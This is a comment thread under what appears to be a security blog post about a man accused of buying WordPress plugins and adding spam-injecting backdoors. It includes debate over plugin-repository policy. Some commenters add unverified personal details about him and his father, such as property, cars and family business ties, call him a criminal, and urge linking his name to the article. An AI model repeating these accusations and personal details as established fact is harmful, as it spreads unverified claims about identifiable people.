kerri@kerrimarvelservices.com September 13, 2017 at 4:28 pm • Reply

Out of morbid curiosity, I tried to look at his Facebook link - he (or Facebook) has already taken it down! No other Facebook pages with his name. Doesn't appear he has a FB page under Kevin Danna either.

Trevor September 13, 2017 at 4:41 pm • Reply

Looks like he's already deleted his Facebook profile. But his Reddit activity does confirm that he's also selling pharmaceuticals.

Neil September 13, 2017 at 5:00 pm • Reply

What an incredible story! Well done Wordfence team, this reads like a thriller and is excellent journalism - despite that not *really* being what you do. Who knew that spam actually pays too?

More importantly this is important information for the WordPress community - both developers and users. You have done a great job in uncovering an important issue.

Ron September 13, 2017 at 5:18 pm • Reply

Wow nice detective work digging into this.
I see his FB is gone. Twitter and YouTube both empty now too.

Luke September 13, 2017 at 6:30 pm • Reply

Well done !
Congratulations!

BigAl September 13, 2017 at 6:43 pm • Reply

Note to self: do not EVER get on the bad side of Mark Maunder.

Mason Wheeler September 13, 2017 at 7:18 pm • Reply

Wow, this guy really annoys me for some reason... :P

Seriously, though, I agree with the others saying you should turn him over to the police. Good riddance to bad trash.

william mccauley September 13, 2017 at 7:44 pm • Reply

Thank you for your research.
It appears he is running in some ways. We'll have to watch for activity
as I get a sense that he doesn't care what damage is left behind.
The character does not seem to be smart enough to run a business.
It appears to be a sham.
Wordfence provides a tremendous service.

Philip Franckel September 13, 2017 at 8:41 pm • Reply

Very impressive investigative work. I'm sending your article to a friend of mine who owns an international investigative agency. I think he'll be impressed too.

Jane September 13, 2017 at 9:28 pm • Reply

$15k for that plugin??? Am I missing something here....

anyway great job as he must have made a ton off my sites alone as I use/used all of the ones he exploited..

Ben September 13, 2017 at 10:20 pm • Reply

This seems to just be a symptom of a bigger issue of poor policies on the part of WordPress.org that probably goes beyond just Mason Soiza.

The details for the majority of plugins don't list who the current maintainer is or when it changes hands. The changelog for the plugin does not give any indication of it ever having been taken down for violation of WordPress policies. The plugin retained its 90% five-star review status with no indication of any bad behavior ever having been discovered between June and September.

So, given how little WordPress did for months to encourage community involvement to self-police known bad behavior of the plugin, I find the attitude being dished out by Jan Dembowski at https://blog.dembowski.net/ really troubling.

In a blog post titled "WordPress Is About Responsibility," he seems to blame WordPress users for not being responsible enough and excuse WP support forum administrators since they are merely unpaid volunteers. He provides as "solutions" that there are WP Site Care and WordPress Meetups, but he provides no proof that involving either of those would have caught the malicious behavior. Again, while WP was aware enough of something violating the rules to have taken the plugin down back on June 22nd, there is no indication of that in the changelog. In fact, rather than state that the download of 38MB of PHP code from an external site was the problem, the changelog contains a willfully misleading claim that the issue was about downloading 50MB of data from MaxMind. So, what would have alerted WP Site Care or a WordPress Meetup member that the plugin needed a re-review, since it otherwise held a perfect track record up to then?

The worst part about Jan Dembowski's attitude/rant is that it goes against how the WordPress project is marketed. At front and center of WordPress.org is "Meet WordPress: WordPress is open source software you can use to create a beautiful website, blog, or app." His blog post seems to indicate it really should say "Meet WordPress: WordPress is open source software [with the help of a technically competent individual that] you can use to create a beautiful website, blog, or app." Regardless of how Dembowski wants the mission statement of WordPress.org to require users to take the responsibility, that isn't what is stated and doesn't excuse forum administrators putting a chilling effect on security reports from people like David Law. Regardless of how much the community tries to take responsibility itself, if they are told to shut up then eventually those that are trying to do the right thing will just give up trying. Also, saying the forum administrator performed those actions for free is not helpful. There is still a cost to the community regardless.

Bottom line: who the current plugin owner is and take-down history need to be more transparent! Any attitude that end-user responsibility can replace that is just offensively misguided.

Joel James September 13, 2017 at 10:32 pm • Reply

Hey Mark,

Thank you for following up. I have replied to your email yesterday. Could you please check? I have something to share which will help you with your investigation.

Mark Maunder September 14, 2017 at 10:13 am • Reply

Have replied. Thank you so much Joel, you shared valuable insight. Trying to get you on Skype now.

Reported September 14, 2017 at 1:44 am • Reply

I have reported his online pharmacy company to both the UK pharmacy regulator and medicines regulator. If he is involved in cyber crime then he is not a fit and proper person to handle sensitive medical records.

James September 14, 2017 at 2:01 am • Reply

Wow! Seriously impressive detective work. Great stuff!

Wisdo September 14, 2017 at 2:25 am • Reply

Lol, it's worth premium just for these blog posts.

Mikey September 14, 2017 at 2:41 am • Reply

Just read this, what a scumbag, thanks Mark for outing this crook

Rhys September 14, 2017 at 3:53 am • Reply

Is any of this illegal? It all sounds very criminal.

Shouldn't the police be involved?

Kevin S September 14, 2017 at 4:31 am • Reply

To be honest this is the first article I have read fully. You guys have done great research. I hope that he gets wiped off the entire Internet for good.

bekspees September 14, 2017 at 4:43 am • Reply

starts to look like a soapy :-)

keep up the good work!!

Daragh September 14, 2017 at 5:07 am • Reply

What a can of worms you just lifted the lid on, Mark. I commend you.

Let's not forget what this actually is... a fascinating insight into the SEO underworld. This guy went straight for the jugular, hijacking thousands of websites by injecting spam content into them with contextual anchor links back to https://www.paydayloansnow.co.uk.

Google search spam team enemy #1.

If we check the Majestic link analysis tool we can see he has links on highly authoritative sites, including government .gov and .edu sites, even NASA:
spaceflightsystems.grc.nasa.gov
morriscountynj.gov
cce.qld.edu.au
teca-print.com

Some links are showing as being deleted on 12th / 13th September, but the Wayback Machine shows him in action - https://web.archive.org/web/20170801063611/https://morriscountynj.gov/

If guys like Mason Soiza can just buy a plugin and release an update with a backdoor, is WordPress safe at all anymore? WordPress has to take notice and be proactive in the defence against online criminals.

Jansie Blom September 14, 2017 at 6:28 am • Reply

Such an interesting post. Like reading Arthur Conan Doyle.

Well done on uncovering Soiza.

Seems he deleted his Facebook account. The water might get a little too warm for him after you've opened this can of worms.

Donna Cavalier September 14, 2017 at 6:34 am • Reply

Like the others commenting here, I found this to be an interesting read, and think you did a great job of ferreting out the information. I do have one negative comment to make though. It seems odd that in the first post, the day before this one, it said at the end,

"I would also ask you to not start any witch hunts. I’m sure some folks are angry about what transpired here, but things happen..."

And then the next day, this guy's entire life is exposed for the world to see. I mean, he deserves it, no doubt. But it almost sounds like you wanted to reserve the witch hunt for yourself.

I'm probably over-reacting, and there was probably no underlying weird connection between the "don't start a witch hunt" request, and the subsequent self-started witch hunt, but it definitely made me say "hmmmm".

Regardless, this was soap-opera worthy reading material.

Mark Maunder September 14, 2017 at 8:15 am • Reply

Hi Donna,

I don't have a problem with you witch hunting malicious actors. It's what we do all day long in information security.

My concern was that the community would go after the WordPress plugin repository maintainers and the forum moderators. That happened in August of last year when we reported the "404 to 301" debacle and it created much unhappiness and additional work on their part. So I was kindly requesting that our community refrain from doing that. It looks like we managed to avoid that this time and other news outlets like Bleeping Computer were kind enough to echo our request.

https://www.bleepingcomputer.com/news/security/backdoor-found-in-wordpress-plugin-with-more-than-200-000-installations/

(See last paragraph)

Regards,

Mark.

Jennifer Hoffman September 21, 2017 at 1:40 pm • Reply

I don't think that the Wordfence team wanted to reserve the great reveal for themselves. They had the data and research supporting their findings that other people did not have. Rather than dumping their findings at one time, they went through a vetting process that secured their story so they could not be accused of libel or trolling or defamation of character. UK laws on these issues are much stricter than those in the US.
And Mark appropriately put out the 'no witch hunt' comment because he didn't want to accuse someone before he had definitive proof. This is not doxxing; Mason Soiza is a criminal and he needs to be exposed, jailed, fined, and maybe his Ferrari sold and the proceeds donated to do good works in the world?
Good job Mark & Wordfence team, I love your product and am a faithful user. Wordfence is the first plugin I add on every WordPress site.

Mark Maunder September 21, 2017 at 1:55 pm • Reply

Thanks Jennifer. Yes, the posts did get published in real-time. We never had any intention of turning this into a series and didn't know where the investigation would take us when we did the first post.

Silvia September 14, 2017 at 6:46 am • Reply

The author of Slimstat Analytics, Jason, answered a related question here hours ago: https://wordpress.org/support/topic/issues-unrelated/#post-9496649
I hope your article will be updated soon; he says he's in contact already. Seeing he's pretty active in supporting his plugin on wordpress.org, I'm not sure why it was so hard to contact him, if necessary, right there in the support forum as other users did after reading this article here ....

Mark Maunder September 14, 2017 at 8:12 am • Reply

I'm trying to establish the facts I posted in a reply here.

Jason Crouse September 14, 2017 at 8:28 am • Reply

Thank you, Silvia. We are offering Mark and his team all the collaboration they need. Hopefully this matter will be clarified ASAP.

Mark Maunder September 14, 2017 at 10:14 am • Reply

Hi. You need to urgently reply to the linkedin message I sent you. The data at this point does not look good. I need to verify your identity.

Jason Crouse September 14, 2017 at 7:01 am • Reply

Dear Mark,

good morning! I'm one of the two team members behind Slimstat. My job is to offer support for our product both on http://support.wp-slimstat.com and on the official support forum over at WP.com. You can imagine my surprise this morning when I opened my support mailbox, as I usually do every morning, and I found many emails from alarmed users mentioning this article.

I'm surprised that, while you did a great job at tracing the whereabouts of that other person, you did not consider the consequences of mentioning WP Slimstat WITHOUT checking with us first. As you can understand, this will be a big hit for our image and reputation. I would like you to post an addendum to your article to do some damage control, as people might not bother to read my comment. As you will see on our support forum and by looking at all our reviews, we strive to stand behind our product, and although we cannot go to places that sell drinks at $16 a pop, we feel like we are contributing to improving the WordPress ecosystem, and that is worth much more than money.

Please note: we are the only committers to the WP repository, and you can rest assured that our software is safe to use and doesn't include any malicious code.

I would like you to kindly remove any reference to our software as soon as possible, since it's becoming a big concern for our users. Please don't hurt our fragile business model. This is not what we deserve after ELEVEN years maintaining Slimstat.

I look forward to hearing from you and your team.

Jason

Mark Maunder September 14, 2017 at 8:10 am • Reply

Got your email with the additional data you shared. Thanks. I'm pasting my reply to you here:

*snip*

The only mention in our post of Slimstat is in the context of Soiza claiming he purchased it.

What I do know is that Soiza appears to be a pathological liar.

I should also point out that we are merely reporting the facts.

I need a few items of information from you.

1. I need proof that you are not Soiza.

2. Once we have established that, I need to know if you sold your plugin.

3. If you did not sell your plugin, I'd like to know if you were contacted by Soiza and what the nature of the communication was.

As you can tell, two other plugin authors have worked closely with me and we have managed to rebuild their credibility and the credibility of their plugins very quickly through transparency. If you're happy to work with me then we can do the same.

The alternative is that we have no data we can work with, merely the claims that I received from you this morning via email.

Unfortunately you can't simply demand that I put content on our blog. You're going to have to work with me to help us both establish what the facts are and once I feel we know what those are with a high degree of confidence, we can report them.

Kind regards,

Mark Maunder.

Jason Crouse September 14, 2017 at 8:23 am • Reply

Dear Mark, I understand where you're coming from. You know how to get in touch with me now. I'm more than happy to collaborate and provide all the information that you need to solve this matter.

Mark Maunder September 14, 2017 at 10:14 am • Reply

You need to urgently contact me via LinkedIn. I'm trying to verify your identity. The data at this point does not look good.

James September 14, 2017 at 8:04 pm • Reply

Mark - where are your thoughts now on Slimstat? Did Jason provide you what you needed? Thanks!

Mark Maunder September 14, 2017 at 10:06 pm • Reply

More soon.

MGmirkin September 18, 2017 at 12:25 pm • Reply

How soon? S'been 4 days...

And do we need to be concerned about the WP-Slimstat (AKA, Slimstat Analytics) plugin in the interim? Have you guys analyzed / audited it?

We use it, and I'd like to be sure we're not in some manner potentially compromised with spam or backdoors, etc. From earlier it sounded like it perhaps wasn't targeted like the others. Just want to make sure.

Mark Maunder September 18, 2017 at 2:03 pm • Reply

More to come tomorrow morning at the latest.

Mark.

Lindsay September 21, 2017 at 3:41 pm • Reply

Any further update?

Mark Maunder September 21, 2017 at 7:23 pm • Reply

Yup. Read the follow-up blog post. Linked at the top. That's all the updates we have for now.

Lindsay September 22, 2017 at 12:45 am • Reply

Thank you - Top Job

Tamara September 14, 2017 at 7:25 am • Reply

Outstanding detective work! Thank you for going above and beyond to expose how these things happen and who's doing it. This is just one of the reasons I recommend people install Wordfence.

Scott Hendison September 14, 2017 at 8:20 am • Reply

GREAT investigative journalism here, and it's what keeps us as paid subscribers to Wordfence. Thank you SO much on behalf of the entire WordPress community...

Ronan September 14, 2017 at 8:51 am • Reply

Great work Mark for alerting us about this. Another important reminder for all WordPress users to check the origin of all source code before you install.

Reminds me of some years back using some of those "free" WP theme websites which had embedded encrypted spammy code hidden in the footer, and if you removed it, it disabled the theme layout.

Mike Davis September 14, 2017 at 10:19 am • Reply

Very impressive detective work, and much appreciated. Thanks, Mark!

Daryl Austman September 14, 2017 at 10:42 am • Reply

You and your team have done some amazing work here and it is so very comforting to know that I am a user/believer of your plugin. Thanks for this incredible and almost unbelievable investigative reporting.

I'm extremely curious as to the control and viability of the plugin "wp-slimstats" as I use that on most of my 80+ WP sites. I'm waiting with bated breath for some news on that one.

Also, I have to say that the comments on this post are almost as intriguing and interesting as the full story... what a whirlwind of excitement this is!

Thanks again for being the ethical, quality company you are that is continuously looking after the best interests of your customers and the WP public in general.

Pierre September 14, 2017 at 10:51 am • Reply

I used to regularly use this plugin (before the change in ownership). While developing a site a few months ago I noticed the plugin was delisted from the plugins directory.

I did some investigation and found information about the spammy links.

However, I view this as a major problem with the plugins directory. If they delist a plugin for security reasons THE PAGE SHOULD STAY UP IN THE DIRECTORY WITH A NOTICE/WARNING TO USERS!!!!!!, as well as display a notice in the WordPress dashboard/plugins page letting users know the same.

The way things work now is the plugin simply disappears. I have developed over 100 sites using the original version of the plugin.

Mark September 14, 2017 at 2:55 pm • Reply

Thanks for this brilliant article exposing these horrendous activities

As a Brit, and as someone who used the Display Widget plugin on a client's website who feels cheated and abused (though I am not aware of any bad incidents occurring through my sites) I felt obligated to try to report this to the National Fraud Intelligence Bureau at http://www.actionfraud.police.uk.

However, as I went through the long reporting form answering the questions, I thought that I would not be the appropriate person to report this. It really needs to be someone affected by a crime or the person who has first-hand collected evidence of a crime. All I could have done is link to this post, and I don't think that is enough for the report.

I understand the reluctance to initiate a report and to wait to be contacted by British authorities.

I really hope, however, that somebody is able to bring this person to the attention of the British police. He seems like an altogether odious person who will most likely go on to find other ways of abusing people unless he is stopped and brought to account by the law.

Perhaps, if there is somebody out there in the British mainstream IT press, or someone who has contacts there, and reads this article, they would know better how to bring this matter to the attention of the British legal system.

Whether or not that happens, long may this person's name be associated through this site with his nefarious deeds (at least until he shows some remorse and evidence of a change of heart).

In that regard, I would like people to link to this article, preferably using this person's name or business names in the link text, so that whenever his name or business is searched for, this page comes up as the first result. Hopefully, then, people will be warned off doing any business with him again.

Thanks again for your help, Wordfence!

Mark Maunder September 14, 2017 at 5:16 pm • Reply

Hi Mark,

Thanks. We've already reached out to the UK authorities. If this needs to become a criminal matter they'll run with it.

Mark.

R. Lynn September 14, 2017 at 3:26 pm • Reply

We've been debating a move for the majority of our clients to one security plugin, and Wordfence has obviously been on the table... Seeing the amount of effort you all put into your work, and into informing the WordPress community as well, is really really impressive.

Safe to say I'm tabling the discussion and buying a Wordfence license now. Thanks so much for all the hard work! You're a damn inspiration.

Dmitry September 14, 2017 at 4:49 pm • Reply

I have this plugin installed!!! I just read about this; should the plugin be deleted? The plugin is useful to me, but if it poses a risk then I will delete it. I have Wordfence installed but don't recall getting any warning about it, but then again I don't read all the email newsletters from WF.

Please advise

Thanks.

Robert Went September 14, 2017 at 5:23 pm • Reply

I have to say, I did laugh when I read some of the blackhat forum posts from this guy.
Telling Rand Fishkin he knows nothing about SEO and all the aftermath, but I sure hope he loses everything from his ill-gotten gains.

From a developer living in the same area and always striving to help clients and keep them on the right side of the law when they suggest some dubious marketing techniques, I find it disgusting to see the life he is living by ruining the lives of others.

Here's wishing karma hits him straight in the face and he ends up a guest at Her Majesty's pleasure.

James September 14, 2017 at 5:54 pm • Reply

To be honest, I used to work in the Lead Generation industry and quit a few years ago as competitors had no ethics. There were a few 'significant players' who were making lots of money using similar methods, playing hardball. Even big companies you know from TV advertising hired similar hotshots.. I can give names, but comparison websites. The most hacked plugins were bought or developed and code was injected at pretty much the same time to produce millions of links from high PR sites or edu sites.. (education sites :) have 'high authority' from an SEO point of view). Because of lead prices and high conversions for PDL this was one of the popular niches. Then sites would be 'burned' after 2 weeks on average. Then they would hijack traffic from people's websites using headers and excluding robots... Anyway, it's a long story. The bottom line is to check plugins if you can, possibly manually. Often social sharing plugins are targeted, and analytics-related ones, because it's pretty easy to hide the code in there..
So if you run a site make sure you update the site, but be extra careful with plugins, see the changelog at least and use a security plugin... i.e. Wordfence. Also check your logs from time to time, and take the effort to learn the basics.

Re consequences - there are plenty of places where the guy can sell his leads and, believe me, often lead buyers don't care or pretend not to know where the leads are coming from. The right route would be to complain to the IFA authorities, but this is also often a long way and useless.
It's quick money on these and you need to have no ethics if you want to win in a popular niche.

TBH I'm surprised that these methods still work after a couple of years.

Peter September 14, 2017 at 5:57 pm • Reply

I love how various websites reinterpret the facts :-)

https://www.scmagazine.com/malicious-wordpress-plugin-installed-backdoor-on-200000-websites/article/688878/

Every other sentence of this post contains false claims. Hilarious.

Mark Maunder September 14, 2017 at 10:08 pm • Reply

It's a catastrophe. I DM'd the author via twitter. No reply.

David Norwood September 14, 2017 at 11:33 pm • Reply

Mark. Do you have any information on needing to check sites that had the compromised Display Widgets on them? Where should one look?

Richard Lake September 15, 2017 at 3:41 am • Reply

I've often thought for a long time that the very most popular WordPress plug-ins need to somehow be insulated from things like these. Perhaps Automattic should have a top tier of developers and plug-ins that must practice x, y and z to be included on a preferential list of some kind. 'Go to' plug-ins need to be protected.

Jan Dembowski September 15, 2017 at 4:17 am • Reply

Hi Mark and Wordfence folks,

This has been a good read and I want to chime in on 2 points. Please forgive me, I'm about to break my own rule of "Comments (and forum posts) are not your blog." 700 plus words. Sheesh.

First point, disclosure.

You did great detective work. While I think it would have been more prudent to withhold this post, this is your site and you did the work. Releasing this information was your call and I honestly don't fault you for that.

This scammer and his ilk are like "It's over 9000!" sock puppets and I really don't like those. Good job. *Raises coffee mug in salute*

I say prudent because I think this package should have been wrapped up and reported to law enforcement as part of legal discovery. IANAL but those that know, know that several laws almost certainly have been broken by this scammer. Delivering this discovery without publicly disclosing it is what security companies do all the time.

Months later you do get to publicly disclose it and your participation when charges are filed by the appropriate prosecution. You get serious security street cred that way.

That way is not sexy, it's not good marketing but it is responsible and Very Bad People™ get charged. Hopefully. That sort of long term thinking really does protect the innocent users and that's the end goal.

Reporting it in a blog post like this is the online equivalent of catch and release.

It's not for law enforcement to contact Wordfence. You know that's not how it works. I'm also aware that you know the process, the how and the who to contact to report this criminal activity.

BUT! Again, you did the work and you get to report it on your site as you see fit. Seriously, good work and congratulations.

Second point: I want to address Ben's comment above. It's based on some misunderstandings.

I'm not WordPress. I'm not on the plugins team, I'm on the Support Team. The plugins team works their tuckus off and they've a much bigger job.

(This comment and long essay represents just my opinion only and not any representative of any group I am part of. I'd hope that's apparent but here we are.)

My personal site represents my opinions only. For someone to follow me from the forums and leave a comment picking a fight with me about this plugin situation on a post about user responsibility is silly. Someone followed me from the forums and I deleted the comment on my site.

Months ago, someone raised a privacy problem with this plugin in the forums. That was looked at by the plugins team and at that time it was determined that that wasn't a violation of the plugin guidelines. Those guidelines are basically an Acceptable Use Policy (AUP) for being allowed to host your code on WordPress.

Before anyone loses it in reply to this, that privacy problem was NOT the malicious back door code. Different problem and holding that up and saying "See? See?" just mis-represents what happened back then. Mark's timeline covers that, read it. It's a good read.

With one or two exceptions, all of WordPress.org is staffed by unpaid volunteers. That's not an excuse, that's not "blame", that's how it is. There are over 50,000 plugins to review. Do a little math, it's statistically likely that this will happen again.

What's remarkable is that it doesn't happen more often.

Please don't @ me for that comment. The plugins team works hard for WordPress users and effectively. Is it perfect? Of course not. Nothing involving real human beings ever is.

Drinks coffee

Hey, it's fine when users get indignant and very angry about what happened. This event with this plugin Sucks Wind Loudly all around. But if you're a WordPress user please consider getting involved in ways that work.

Just saying "how little WordPress did (they did a lot BTW)" or "I can't believe his attitude (on his personal site)" isn't doing anything useful. Go to a Wordcamp, go to a meetup (online or in person), suggest ideas, provide feedback. Get ready to do the work.

Or as I ended off on my blog post: "Don't accept blame for what happens to your WordPress site. Take responsibility instead." That also applies to anyone's participation in our swell community. Problems are made by people, they're also solved by other people. Let's work together and work out a way to improve the communication all around that works and is practical.

Mark Maunder September 15, 2017 at 8:31 am

Thanks Jan. Lots happening on the back-end you're not aware of. Watch this space. We appreciate your work as forum mod. :-)

Ben September 15, 2017 at 7:13 am

It would be neat if plugin authors could pay a fee to a reputable web security company (like Wordfence, Sucuri or someone) to review their code and give them a badge or rating on the WordPress.org plugin download page.

A unique / separate security rating system at Wordpress.org would help.

Bijay Gupta September 15, 2017 at 11:50 am

Nice. For me this is called research... detective work.

Thanks for the insights, which will help out every curious webmaster.

Great Work Mark & WORDFENCE Team.

Anca September 15, 2017 at 4:15 pm

Thank you for this update, and for everything you do. The story gets more and more like a thriller every day.

Rupert Hussey September 15, 2017 at 5:35 pm

Friggin' first rate research and reporting. Premium service at its best. Thank you Mark and team!

Andy Renals September 15, 2017 at 11:49 pm

Week in week out you and your team do great work Mark. As one of those people yet to commit to your paid service I am really thankful. This article adds kudos and brings me closer to joining.

Puru September 16, 2017 at 11:43 pm

Mason has been Sherlocked! This is quality detective work!

Eric September 19, 2017 at 2:05 pm

Just unreal! Great job of digging up dirt on this guy.

Pete F September 20, 2017 at 8:33 am

You overlooked the racehorse, jointly owned with his father Joe Soiza who is (or was) also a director of at least one of Mason's companies. This looks like a family business, and I don't think Mason is the brains of the outfit. He just seems to like the things that large amounts of money can buy. Perhaps dabbling in fake pharma, gambling (casinos were mentioned) and unsecured loans - very high rates of interest, but all perfectly legal - helps pay the bills.

https://www.racingpost.com/profile/owner/253835/joe-soiza-mason-soiza/horses

Mark Maunder September 20, 2017 at 9:56 am

Thanks Pete. We didn't. Also didn't overlook a lot of other facts that weren't WP relevant. We also have confidential sources and data we can't or chose not to share.

Jen September 26, 2017 at 8:00 am

Well he (not his father) owns that property which his company Soiza Limited is registered to (Jubilee Cottage), which he bought for a fat £777k in December 2016. So he can't be doing too badly himself.

em September 26, 2017 at 11:14 pm

According to my boyfriend who trained at the same gym, they own a fleet of high end sports cars.
Lamborghinis, Ferraris, Mercedes and more in the space of a couple of years. Rather like a rags to riches success story! Sickens you to think how hard you have to work in SEO when being honest.

HONEST GUV September 20, 2017 at 1:27 pm

I think this is one of the best exposures I have seen after many years of dealing with online fraud. Fabulous tracking all this down. These criminals often try to hide, however, and have aliases and fake profiles that can be woken at any time, and while you can't see his obvious profiles anymore he has not shut up shop and run; he has merely hidden them for now and will wake them briefly to keep them alive. It is absolutely certain he is up and running again and business continues as usual. Scammers never cease their fundraising activities, and education and awareness, such as shown above, is always the solution.

jim September 22, 2017 at 7:35 am

This is despicable and should be investigated by the UK police. It made a great read, keep up the good work. I do hope it has been reported?

Chris Haines September 26, 2017 at 12:26 pm

Fantastic read, the level of detective work in this post is impressive.
